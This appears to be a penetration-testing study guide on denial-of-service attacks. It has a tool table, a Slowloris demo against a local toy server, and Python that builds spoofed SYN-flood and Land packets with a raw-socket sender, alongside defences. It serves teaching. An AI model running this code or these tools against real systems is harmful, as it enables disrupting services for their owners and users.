A denial-of-service (DoS) attack is one that prevents the target from performing its normal duties on the network. Although this is typically accomplished by flooding the target with network traffic, it can also be accomplished by crashing a service or by consuming all of a server's resources, including CPU, memory, disk space, or the allowed number of client connections. The attack can be protocol-, operating system-, or service-specific. You can also craft the attack packets so that they evade IDS or firewall detection. For traffic-based DoS attacks against a well-provisioned target, a single attacker is unlikely to have much (if any) impact. The most serious form is the distributed denial-of-service (DDoS) attack, in which thousands or hundreds of thousands of machines (typically a botnet) are coordinated against a single target.

The following table summarizes common DoS attack types and tools.

| DoS Attack Type | Description | Tool Examples |
|---|---|---|
| Packet flood | Create and send massive amounts of TCP, UDP, ICMP, or random packet traffic to the target to saturate its bandwidth or packet-processing capacity. Can use different TCP flag variants (SYN, ACK, FIN, XMAS). | hping3, nemesy, XOIC, Low Orbit Ion Cannon (LOIC), Spike DDoS Toolkit, xcrush-20 |
| SYN flood | Send massive amounts of TCP SYN packets, usually with spoofed source addresses, so that the target fills its half-open connection (backlog) table with handshakes that never complete. | hping3, Metasploit auxiliary/dos/tcp/synflood, Spike DDoS Toolkit, xcrush-20 |
| Ping of Death | Send a fragmented ICMP ECHO REQUEST whose reassembled size exceeds the 65,535-byte IP maximum, causing an unpatched target to crash, freeze, or reboot. Modern operating systems are not vulnerable, and current ping utilities reject oversized payloads. | jolt, xcrush-20, eugenics.pl, Crazy Pinger, ping.exe; e.g., ping -l 65510 your.target.ip.address |
| ICMP/UDP fragmentation attack | Variant of the UDP flood or Ping of Death. Send the target UDP or ICMP fragments that reassemble into a datagram larger than the IP maximum, or that never complete, so the target spends CPU and memory on reassembly buffers. | hping3, spike.sh, eugenics.pl |
| TCP fragmentation attack | Send the target IP fragments of a TCP segment whose fragment offsets overlap so they cannot be reassembled correctly (Teardrop). Windows NT, Windows 95, and Linux versions prior to 2.1.63 are most vulnerable. | Teardrop, NewTear, Bonk, Boink, Targa, xcrush-20, eugenics.pl |
| Smurf attack | Send large numbers of ICMP ECHO REQUESTs, with the source address spoofed to the target, to the broadcast address of an intermediate network; every host that answers replies to the target. | hping3, xcrush-20, eugenics.pl |
| Fraggle attack | Same as a Smurf attack, except uses UDP (typically to the echo or chargen ports) instead of ICMP. | xcrush-20, eugenics.pl |
| Land attack | Send a spoofed TCP SYN in which the source and destination IP address and port are identical. A vulnerable target replies to itself, and its TCP stack locks up or loops. | hping3, Land, Targa, LaTierra, xcrush-20, eugenics.pl |
| SMB malformed request | Send a malformed request to an SMB named pipe, causing a Stop error (Blue Screen of Death) on unpatched Windows. | SMBDie, Bitchslap |
| Slowloris | Open as many HTTP connections as possible and keep them alive by sending partial requests (headers without the terminating blank line) at intervals, until the server's connection limit is reached and legitimate clients are refused. A single machine can take down a web server with very little bandwidth and without affecting other ports or services on the target. | Slowloris script, R-U-Dead-Yet (RUDY) |
| NTP amplification | Send small NTP queries (classically the monlist command), with the source address spoofed to the target, to publicly reachable NTP servers, which send their much larger responses to the target. | NTPDos, NTPDoser, Saddam |
| HTTP flood attack | Use seemingly legitimate HTTP GET or POST requests to exhaust a web server or application. Does not require spoofing or malformed packets; a single request to an expensive page (search, report generation) can consume significant server resources. | High Orbit Ion Cannon (HOIC), Low Orbit Ion Cannon (LOIC), XOIC, HULK, DDOSIM, Tor's Hammer, PyLoris, OWASP DOS HTTP POST, DAVOSET, GoldenEye HTTP Denial Of Service Tool, Spike DDoS Toolkit |
| DNS flood attack | Consume all CPU or memory of a DNS server with a flood of queries, for example for random non-existent names so that caching does not help. | zodiac, DNS Flood, Hyenae, Spike DDoS Toolkit |
| DNS amplification attack | Like Smurf and other amplification attacks: multiple open DNS resolvers receive small queries (typically for large records or type ANY), with the source spoofed to the target, and send their large responses to the target. | Saddam, Tsunami, DDoS Attack |

Note: Many of these tools can be used for multiple DoS attack types. You may find variants with different features.
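The Slowloris row in the table describes holding connections open with incomplete requests until the server has no slots left for anyone else. The following is an added example, not code from the original page or from the Slowloris script: a constructed toy HTTP server with two request slots, an attacker that opens exactly that many connections and never finishes its headers, and a legitimate client whose request times out until the attacker lets go. Everything runs over 127.0.0.1 inside one process; the slot count, timeouts, and ports are assumptions for the demonstration.

```python
"""Slowloris against a local toy HTTP server (added example; all data constructed)."""
import socket
import threading
import time

MAX_WORKERS = 2          # request slots the toy server can hand out (assumed)
HEADER_TIMEOUT = 3.0     # seconds the server waits for a complete request (assumed)


class ToyHttpServer:
    """Minimal threaded HTTP server with a fixed pool of request slots.

    Each accepted connection waits for a free slot, then reads headers until
    the blank line that terminates them. The slot is held for the entire read,
    which is exactly what Slowloris exploits.
    """

    def __init__(self):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(("127.0.0.1", 0))            # ephemeral port
        self.sock.listen(64)
        self.sock.settimeout(0.2)                   # lets the accept loop check stop
        self.port = self.sock.getsockname()[1]
        self.slots = threading.BoundedSemaphore(MAX_WORKERS)
        self.stop = threading.Event()
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while not self.stop.is_set():
            try:
                conn, _ = self.sock.accept()
            except socket.timeout:
                continue
            threading.Thread(target=self._handle, args=(conn,), daemon=True).start()
        self.sock.close()

    def _handle(self, conn):
        with self.slots:                            # block until a slot is free
            conn.settimeout(HEADER_TIMEOUT)
            buf = b""
            try:
                while b"\r\n\r\n" not in buf:       # keep reading until headers end
                    chunk = conn.recv(4096)
                    if not chunk:                   # peer closed before finishing
                        return
                    buf += chunk
                conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\nok")
            except (socket.timeout, OSError):
                pass                                # slow peer timed out; slot freed
            finally:
                conn.close()


def slowloris_connect(port, count):
    """Open `count` connections and send only a partial request on each.
    The missing blank line keeps the server waiting, and keeps a slot busy."""
    conns = []
    for _ in range(count):
        s = socket.create_connection(("127.0.0.1", port))
        s.sendall(b"GET / HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: x\r\n")
        conns.append(s)
    return conns


def slowloris_keepalive(conns):
    """Real Slowloris sends a bogus header every few seconds so the server's
    header timeout never fires; one such line per connection here."""
    for s in conns:
        s.sendall(b"X-a: b\r\n")


def legit_request(port, timeout):
    """Send a complete request; return the response bytes, or None on timeout."""
    s = socket.create_connection(("127.0.0.1", port))
    s.sendall(b"GET / HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n")
    s.settimeout(timeout)
    try:
        return s.recv(4096)
    except socket.timeout:
        return None
    finally:
        s.close()


def run_demo():
    """Attack, observe the legitimate client starve, release, observe recovery."""
    server = ToyHttpServer()
    try:
        attack = slowloris_connect(server.port, MAX_WORKERS)
        time.sleep(0.3)                             # let the server hand out its slots
        slowloris_keepalive(attack)
        blocked = legit_request(server.port, timeout=1.0) is None
        for s in attack:                            # attacker gives up; slots free up
            s.close()
        time.sleep(0.3)
        served = legit_request(server.port, timeout=HEADER_TIMEOUT) is not None
        return {"blocked_during_attack": blocked, "served_after_attack": served}
    finally:
        server.stop.set()


if __name__ == "__main__":
    print(run_demo())
```

The demo needs only two sockets and a few hundred bytes to deny service, which is why bandwidth-based flood detection misses Slowloris; the defences that work are per-source connection limits, a short header timeout that is not reset by each trickled byte (Apache's mod_reqtimeout, nginx client_header_timeout), and an event-driven server that does not dedicate a worker per connection.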

DoS attack example

The following figure shows the command and output from a web server SYN flood generated from the hping3 tool.

Hping3 web server SYN flood
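The hping3 SYN flood in the figure above hand-builds TCP SYN segments, typically with random spoofed sources (hping3 -S --flood --rand-source -p 80 target). As an added example, not code from the original page or from hping3, the following Python constructs the same IPv4/TCP SYN packet byte by byte, including the RFC 1071 checksums hping3 has to get right for the target's stack to accept the segment, and reuses the builder for the table's Land attack (source equals destination) and a spoofed SYN flood. Nothing is transmitted; the addresses are constructed, and send_raw is included only to show the raw-socket call a real run would need (root and an authorized lab target).

```python
"""Raw IPv4/TCP SYN, Land and spoofed SYN-flood packet builder (added example)."""
import random
import socket
import struct

SYN = 0x02


def internet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over `data` (zero-padded to even length)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                              # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv4_header(src: str, dst: str, payload_len: int, ident: int) -> bytes:
    """20-byte IPv4 header for a TCP payload, checksum filled in."""
    hdr = struct.pack("!BBHHHBBH4s4s",
                      (4 << 4) | 5, 0, 20 + payload_len, ident, 0,
                      64, socket.IPPROTO_TCP, 0,    # TTL 64, checksum placeholder
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", internet_checksum(hdr)) + hdr[12:]


def tcp_syn_segment(src: str, sport: int, dst: str, dport: int, seq: int) -> bytes:
    """20-byte TCP header with only SYN set; checksum covers the pseudo-header."""
    seg = struct.pack("!HHIIBBHHH", sport, dport, seq, 0,
                      5 << 4, SYN, 65535, 0, 0)     # offset 5 words, window, csum, urg
    pseudo = struct.pack("!4s4sBBH", socket.inet_aton(src), socket.inet_aton(dst),
                         0, socket.IPPROTO_TCP, len(seg))
    return seg[:16] + struct.pack("!H", internet_checksum(pseudo + seg)) + seg[18:]


def syn_packet(src, sport, dst, dport, seq=None, ident=None) -> bytes:
    """Complete IP+TCP SYN; random ISN and IP id unless given (for reproducibility)."""
    seq = random.getrandbits(32) if seq is None else seq
    ident = random.getrandbits(16) if ident is None else ident
    seg = tcp_syn_segment(src, sport, dst, dport, seq)
    return ipv4_header(src, dst, len(seg), ident) + seg


def land_packet(target: str, port: int) -> bytes:
    """Land attack: source and destination address and port are identical."""
    return syn_packet(target, port, target, port)


def spoofed_syn_flood(dst: str, dport: int, count: int, seed=None):
    """What `hping3 -S --flood --rand-source` emits: SYNs from random sources."""
    rng = random.Random(seed)
    pkts = []
    for _ in range(count):
        src = "%d.%d.%d.%d" % tuple(rng.randrange(1, 255) for _ in range(4))
        pkts.append(syn_packet(src, rng.randrange(1024, 65536), dst, dport,
                               rng.getrandbits(32), rng.getrandbits(16)))
    return pkts


def checksums_ok(pkt: bytes) -> bool:
    """A receiver's check: summing a header that includes its own correct checksum yields 0."""
    ip, seg = pkt[:20], pkt[20:]
    pseudo = struct.pack("!4s4sBBH", ip[12:16], ip[16:20], 0, socket.IPPROTO_TCP, len(seg))
    return internet_checksum(ip) == 0 and internet_checksum(pseudo + seg) == 0


def send_raw(pkt: bytes, dst: str) -> None:
    """Needs CAP_NET_RAW (root) and an authorized target; not called in this example."""
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)  # we supply the IP header
    s.sendto(pkt, (dst, 0))
    s.close()


if __name__ == "__main__":
    p = syn_packet("10.0.0.5", 40000, "192.0.2.10", 80, seq=1, ident=7)  # constructed
    print(len(p), "bytes, checksums ok:", checksums_ok(p))
    print("land packet ok:", checksums_ok(land_packet("192.0.2.10", 80)))
```

Two practical points follow from the code. Spoofed sources only work when the attacker's upstream network does not filter egress addresses (BCP 38), which is why botnet nodes on poorly filtered networks are preferred for this. On the defending side, the target's backlog fills only if it keeps state per SYN; SYN cookies (Linux net.ipv4.tcp_syncookies) encode that state in the server's initial sequence number instead, so a flood of SYNs with valid checksums but no following ACK costs the target almost nothing.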

Note: You can search for Metasploit DoS modules at the msf console. For example, to search for DoS attacks that involve DNS, enter search type:auxiliary name:dos -S dns.

Stress Testing

Stress testing is often a euphemism for conducting a denial-of-service attack against a target. You use scripts, bots, or other tools to deliberately and intensively load a server or service to see how it performs. Some stress testers simply flood the target with distributed denial-of-service (DDoS) traffic. Others are application-specific and simulate very high numbers of realistic user requests. An administrator might use stress testing to verify that a website can withstand an attack or abnormally high traffic, and to find the load at which it degrades.

Because the intent is to render the service non-functional, a pen tester must have explicit authorization, with the scope and time window agreed, before stress testing a production machine. The client must also understand the implications of stress testing live servers, such as lost transactions, cascading failures in dependent systems, and alerts from the ISP or hosting provider. There are many commercially available stress testing services and products available online. There are also "booter" or "stresser" sites that will rent you their illegal botnet for "stress testing" purposes, charging a nominal price by the hour; using them attacks the networks between you and the target as well as the target itself.